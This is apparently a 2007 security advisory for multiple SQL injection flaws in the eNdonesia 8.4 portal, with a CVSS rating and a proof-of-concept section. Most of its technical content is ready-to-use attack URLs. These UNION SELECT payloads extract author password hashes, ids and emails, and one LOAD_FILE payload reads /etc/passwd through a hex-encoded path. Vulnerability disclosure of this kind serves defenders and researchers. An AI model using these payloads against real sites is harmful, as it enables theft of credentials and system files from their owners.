eNdonesia 8.4 [multiple injection sql]

2007.06.28
Credit: laurent gaffi
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Application: eNdonesia 8.4 Web Site: http://www.endonesia.org/ Versions: all Platform: linux, windows Bug: multiple injection sql Fix Available: no ------------------------------------------------------- 1) Introduction 2) Bug 3) proof of concept =========== 1) Introduction =========== "eNdonesia 8.4 is a web portal application, content management system, news publishing systems, or whatever you want to name it. It has been developed to enable people build their own internet empire by providing portal for the public, just like what Yahoo has done, and Google want to do. " ====== 2) Bug ====== injection sql ===== 3)proof of concept ===== http://site.com/mod.php?mod=katalog&op=viewlink&cid=-1+union+select+1,pw d,3+from+authors/* http://site.com/mod.php?mod=katalog&op=viewlink&cid=-1+union+select+1,LO AD_FILE(0x2F6574632F706173737764),3+from+authors/* --> get some local files with load_file ( you it's a priviliged account ) http://site.com/banners.php?op=click&bid=-9+union+select+pwd+from+author s/* http://site.com/mod.php?mod=diskusi&op=viewdisk&did=-9+union+select+1,2, aid,pwd,5,6,email+from+authors/* http://site.com/mod.php?mod=publisher&op=viewarticle&cid=2&artid=-9+unio n+select+1,2,3,4,5,pwd,aid,email,9,0+from+authors/* regards laurent gaffi contact : laurent.gaffie (at) gmail (dot) com [email concealed]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top